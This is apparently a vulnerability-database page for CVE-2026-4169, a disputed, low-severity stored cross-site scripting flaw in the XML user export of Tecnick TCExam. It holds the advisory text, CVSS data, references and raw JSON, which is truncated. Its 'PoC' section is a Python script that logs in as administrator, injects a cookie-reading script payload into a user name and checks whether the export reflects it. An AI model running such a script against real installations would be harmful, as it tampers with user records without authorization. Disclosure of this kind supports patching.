CVE-2026-4169

Description

A security flaw has been discovered in Tecnick TCExam up to 16.6.0. Affected is the function F_xml_export_users of the file admin/code/tce_xml_users.php of the component XML Export. Performing a manipulation results in cross site scripting. Remote exploitation of the attack is possible. There are still doubts about whether this vulnerability truly exists. Upgrading to version 16.6.1 is able to address this issue. The patch is named 899b5b2fa09edfe16043f07265e44fe2022b7f12. It is suggested to upgrade the affected component. When the vendor was informed about another security issue, he identified and fixed this flaw during analysis. He doubts the impact of this: "However, this is difficult to justify as security issue. It requires to be administrator to both create and consume the exploit. Administrators can do pretty much anything in the platform, so I don't see the point of this from a security perspective." This is reflected by the CVSS vector.

CVSS Details

CVSS Score

2.4

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Tecnick TCExam <= 16.6.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import base64

# CVE-2026-4169 PoC - Tecnick TCExam XSS via XML Export
# Target: Tecnick TCExam <= 16.6.0

TARGET_URL = "http://target-website.com/tcexam"
USERNAME = "admin"
PASSWORD = "admin_password"

session = requests.Session()

# Step 1: Login to get authenticated session
login_url = f"{TARGET_URL}/admin/code/tce_login.php"
login_data = {
    "user_name": USERNAME,
    "user_password": PASSWORD,
    "action": "login"
}
session.post(login_url, data=login_data)

# Step 2: Inject XSS payload into user profile field
# Target field: user_name or any user-related field
xss_payload = '<script>alert(document.cookie)</script>'
update_url = f"{TARGET_URL}/admin/code/tce_edit_user.php"
update_data = {
    "user_id": "1",
    "user_name": xss_payload,
    "change_user": "true"
}
session.post(update_url, data=update_data)

# Step 3: Trigger XML export to trigger XSS
xml_export_url = f"{TARGET_URL}/admin/code/tce_xml_users.php"
response = session.get(xml_export_url)

# Check if payload is reflected in XML output
if xss_payload in response.text:
    print("[+] XSS payload found in XML export response")
    print("[+] PoC successful - vulnerability confirmed")
else:
    print("[-] Payload not found - vulnerability may be patched")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4169
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4169
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4169/
[4] VulDB https://vuldb.com/cve/CVE-2026-4169
[5] https://github.com/tecnickcom/tcexam/commit/899b5b2fa09edfe16043f07265e44fe2022b7f12
[6] https://github.com/tecnickcom/tcexam/releases/tag/16.6.1
[7] https://vuldb.com/?ctiid.351076
[8] https://vuldb.com/?id.351076

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4169", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:56.593", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Tecnick TCExam up to 16.6.0. Affected is the function F_xml_export_users of the file admin/code/tce_xml_users.php of the component XML Export. Performing a manipulation results in cross site scripting. Remote exploitation of the attack is possible. There are still doubts about whether this vulnerability truly exists. Upgrading to version 16.6.1 is able to address this issue. The patch is named 899b5b2fa09edfe16043f07265e44fe2022b7f12. It is suggested to upgrade the affected component. When the vendor was informed about another security issue, he identified and fixed this flaw during analysis. He doubts the impact of this: \"However, this is difficult to justify as security issue. It requires to be administrator to both create and consume the exploit. Administrators can do pretty much anything in the platform, so I don't see the point of this from a security perspective.\" This is reflected by the CVSS vector."}, {"lang": "es", "value": "Se ha descubierto un fallo de seguridad en Tecnick TCExam hasta la versión 16.6.0. Afecta a la función F_xml_export_users del archivo admin/code/tce_xml_users.PHP del componente XML Export. Realizar una manipulación resulta en cross-site scripting. La explotación remota del ataque es posible. Todavía existen dudas sobre si esta vulnerabilidad realmente existe. Actualizar a la versión 16.6.1 puede solucionar este problema. El parche se denomina 899b5b2fa09edfe16043f07265e44fe2022b7f12. Se sugiere actualizar el componente afectado. Cuando se informó al proveedor sobre otro problema de seguridad, identificó y corrigió este fallo durante el análisis. Duda del impacto de esto: 'Sin embargo, esto es difícil de justificar como un problema de seguridad. Requiere ser administrador tanto para crear como para consumir el exploit. Los administradores pueden hacer prácticamente cualquier cosa en la plataforma, así que no le veo el sentido desde una perspectiva de seguridad.' Esto se refleja en el vector CVSS."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "baseScore": 3.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.4, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79" ... (truncated)